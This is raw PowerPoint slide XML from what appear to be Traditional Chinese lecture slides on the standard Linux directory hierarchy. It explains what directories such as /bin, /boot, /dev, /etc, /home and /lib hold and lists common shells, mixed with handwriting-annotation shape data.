              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的磁碟中會有許多系統預設的目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這些目錄依照不同的用途而放置特定的檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。以下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將詳細說明每一個預設目錄的功用：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：根目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含整個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>系統的所有目錄和檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：此目錄放置操作系統時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所需使用的各種指令程式。例如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>rpm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>kill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>mv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等等常用指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>還有各種不同的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>zsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tcsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等等。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7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27000" y="3549600"/>
              <a:ext cx="1352880" cy="1083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11160" y="3486240"/>
                <a:ext cx="138456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908440" y="3587760"/>
              <a:ext cx="552600" cy="259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92600" y="3524400"/>
                <a:ext cx="5842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746520" y="3664080"/>
              <a:ext cx="41292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30680" y="3600360"/>
                <a:ext cx="444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842080" y="3625920"/>
              <a:ext cx="609840" cy="763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826240" y="3562200"/>
                <a:ext cx="64152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6934320" y="3664080"/>
              <a:ext cx="1365480" cy="255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918480" y="3600360"/>
                <a:ext cx="13971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422360" y="4102200"/>
              <a:ext cx="476640" cy="64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406520" y="4038480"/>
                <a:ext cx="5083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378240" y="4648320"/>
              <a:ext cx="1879920" cy="637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362400" y="4584600"/>
                <a:ext cx="19116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277040" y="4680000"/>
              <a:ext cx="1194120" cy="129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261200" y="4616280"/>
                <a:ext cx="122580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076480" y="5162400"/>
              <a:ext cx="36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60640" y="5099040"/>
                <a:ext cx="320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1854360" y="5168880"/>
              <a:ext cx="889200" cy="320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838160" y="5105520"/>
                <a:ext cx="9212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876240" y="4641840"/>
              <a:ext cx="603720" cy="320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860400" y="4578480"/>
                <a:ext cx="6354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203040" y="3492360"/>
              <a:ext cx="540360" cy="121320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93680" y="3483000"/>
                <a:ext cx="559080" cy="1231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6063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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：已經</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>被 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/bin/bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>取代</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>預設的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ksh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Kornshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>AT&amp;T Bell lab. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>發展出來的，相容於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bash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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tcsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：整合 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>C Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，提供更多的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>csh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：已經</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>被 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tcsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>取代</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>zsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：基於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ksh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>發展出來的，功能更強大的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。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3E045B75-5240-41B0-A7DC-8940F814183E}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統內的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r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5826240" y="672840"/>
              <a:ext cx="1045080" cy="684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10040" y="609120"/>
                <a:ext cx="1077120" cy="13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00530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000" dirty="0"/>
              <a:t>/boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：系統啟動時必須讀取的檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>包括系統核心在內。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：存放周邊設備代號的檔案。例如硬碟的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>hda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>、終端機的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/dev/tty0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>等等。這些檔案比較特殊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>它們實際上都指向所代表的周邊設備。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：放置與系統設定、管理相關的檔案。例如記錄帳號名稱的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>檔、投影密碼檔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>都放在這裡。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>rc.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：這個目錄包含了開機或關機時所執行的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>檔案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US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74720" y="1562040"/>
              <a:ext cx="533880" cy="129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8880" y="1498680"/>
                <a:ext cx="5655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851200" y="1542960"/>
              <a:ext cx="3499200" cy="1339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35360" y="1479600"/>
                <a:ext cx="353088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870120" y="2558880"/>
              <a:ext cx="806760" cy="6408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53920" y="2495520"/>
                <a:ext cx="8388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3670200" y="2635200"/>
              <a:ext cx="654480" cy="259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654360" y="2571840"/>
                <a:ext cx="6861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895320" y="4514760"/>
              <a:ext cx="654480" cy="684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79480" y="4451400"/>
                <a:ext cx="6861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3193920" y="4464000"/>
              <a:ext cx="838800" cy="194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178080" y="4400640"/>
                <a:ext cx="8704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111640" y="4502160"/>
              <a:ext cx="343440" cy="194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095800" y="4438800"/>
                <a:ext cx="37512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6953400" y="4508640"/>
              <a:ext cx="203400" cy="25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937200" y="4444920"/>
                <a:ext cx="2354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063880" y="4965840"/>
              <a:ext cx="55908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48040" y="4902120"/>
                <a:ext cx="5907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5727600" y="4991040"/>
              <a:ext cx="1842120" cy="194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711760" y="4927680"/>
                <a:ext cx="187380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025880" y="4940280"/>
              <a:ext cx="1632240" cy="5760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010040" y="4876920"/>
                <a:ext cx="166392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筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="965160" y="5905440"/>
              <a:ext cx="1175040" cy="7668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949320" y="5842080"/>
                <a:ext cx="120672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4286160" y="5918040"/>
              <a:ext cx="572040" cy="3852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270320" y="5854680"/>
                <a:ext cx="6037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5442120" y="5994360"/>
              <a:ext cx="749520" cy="320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425920" y="5931000"/>
                <a:ext cx="7815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6540480" y="5956200"/>
              <a:ext cx="1454400" cy="684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6524640" y="5892840"/>
                <a:ext cx="14860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812880" y="6362640"/>
              <a:ext cx="254160" cy="194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97040" y="6299280"/>
                <a:ext cx="28584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1727280" y="6426360"/>
              <a:ext cx="1663920" cy="8928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1711440" y="6362640"/>
                <a:ext cx="169560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-565200" y="4216320"/>
              <a:ext cx="1492560" cy="38772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-574560" y="4206960"/>
                <a:ext cx="1511280" cy="40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7715160" y="1454040"/>
              <a:ext cx="546480" cy="1332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699320" y="1390680"/>
                <a:ext cx="5781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933480" y="2031840"/>
              <a:ext cx="609840" cy="36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917640" y="1968480"/>
                <a:ext cx="6415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2152800" y="2546280"/>
              <a:ext cx="1981440" cy="5760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136600" y="2482920"/>
                <a:ext cx="201348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7429680" y="2565360"/>
              <a:ext cx="1022400" cy="7668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413480" y="2502000"/>
                <a:ext cx="105444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8" name="筆跡 27"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="965160" y="3016080"/>
              <a:ext cx="1270440" cy="76680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="筆跡 27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49320" y="2952720"/>
                <a:ext cx="130212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9" name="筆跡 28"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2743200" y="3009960"/>
              <a:ext cx="902160" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="筆跡 28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727360" y="2946240"/>
                <a:ext cx="9338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0" name="筆跡 29"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4552920" y="2984400"/>
              <a:ext cx="1397520" cy="83160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="筆跡 29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4537080" y="2921040"/>
                <a:ext cx="142920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筆跡 30"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6902280" y="4527720"/>
              <a:ext cx="362520" cy="12960"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="筆跡 30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6886440" y="4464000"/>
                <a:ext cx="3942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2" name="筆跡 31"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="936000" y="5457600"/>
              <a:ext cx="1528920" cy="72000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="筆跡 31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19800" y="5394240"/>
                <a:ext cx="156096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3" name="筆跡 32"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3186000" y="4457520"/>
              <a:ext cx="1564920" cy="57600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="33" name="筆跡 32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3170160" y="4394160"/>
                <a:ext cx="159660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34" name="筆跡 33"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5179320" y="4393440"/>
              <a:ext cx="978840" cy="36000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="34" name="筆跡 33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5163480" y="4329720"/>
                <a:ext cx="10105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35" name="筆跡 34"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="0" y="5243400"/>
              <a:ext cx="621720" cy="1250640"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="筆跡 34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-15840" y="5180040"/>
                <a:ext cx="653760" cy="137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16" name="筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1917720" y="4489560"/>
              <a:ext cx="546480" cy="320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1901880" y="4425840"/>
                <a:ext cx="5781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36" name="筆跡 35"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5187960" y="4483080"/>
              <a:ext cx="876600" cy="19440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="36" name="筆跡 35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5172120" y="4419720"/>
                <a:ext cx="9082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37" name="筆跡 36"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4038480" y="4984920"/>
              <a:ext cx="1613520" cy="32040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="37" name="筆跡 36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4022640" y="4921200"/>
                <a:ext cx="164520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38" name="筆跡 37"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1746360" y="6432480"/>
              <a:ext cx="1524240" cy="25920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="筆跡 37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1730520" y="6369120"/>
                <a:ext cx="15559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39" name="筆跡 38"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="304920" y="1308240"/>
              <a:ext cx="616320" cy="3156120"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="39" name="筆跡 38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295560" y="1298880"/>
                <a:ext cx="635040" cy="3174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3448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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/X11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>X Window </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>設定檔案的目錄。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：此目錄預設用來放置使用者帳號的家目錄。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：放置一些共用的函式庫。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/lib/modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：存放系統核心的模組。某些可被模組化的部份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>並不需要在編譯系統核心時放入核心本體</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>避免核心過大導致效率低落。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5479920" y="2095560"/>
              <a:ext cx="2781720" cy="51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64080" y="2031840"/>
                <a:ext cx="28134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39960" y="2508120"/>
              <a:ext cx="984600" cy="146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23760" y="2444760"/>
                <a:ext cx="101664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914400" y="3270240"/>
              <a:ext cx="546480" cy="511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98560" y="3206880"/>
                <a:ext cx="5781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860480" y="3225960"/>
              <a:ext cx="4153320" cy="9540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844640" y="3162240"/>
                <a:ext cx="418500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933480" y="3848040"/>
              <a:ext cx="1918080" cy="194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7640" y="3784680"/>
                <a:ext cx="194976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3562200" y="3828960"/>
              <a:ext cx="2642040" cy="511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46360" y="3765600"/>
                <a:ext cx="267372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6337440" y="3772080"/>
              <a:ext cx="432000" cy="5724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321600" y="3708360"/>
                <a:ext cx="4636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914400" y="2143080"/>
              <a:ext cx="871920" cy="288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98560" y="2079360"/>
                <a:ext cx="90360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3657600" y="2185920"/>
              <a:ext cx="1086120" cy="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641760" y="2122560"/>
                <a:ext cx="11178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" name="筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="399960" y="1847880"/>
              <a:ext cx="425880" cy="16257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90600" y="1838520"/>
                <a:ext cx="444600" cy="1644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363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/</a:t>
            </a:r>
            <a:r>
